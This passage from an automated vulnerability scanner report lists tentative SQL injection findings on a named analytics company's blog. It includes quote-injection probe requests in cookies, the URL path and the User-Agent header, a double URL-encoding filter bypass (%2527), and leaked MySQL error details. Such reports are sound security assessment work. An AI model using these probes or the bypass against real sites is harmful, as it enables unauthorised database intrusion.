HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:09:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.41. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:59:20 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:59:20 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23610


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.42. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics'/91-google-analytics-cookies-and-domains.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics''/91-google-analytics-cookies-and-domains.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:14:19 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:14:20 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.43. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:12:26 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:12:26 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.44. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.45. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:58:43 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:58:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.46. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:55:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:55:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.47. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937'; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937''; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.48. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
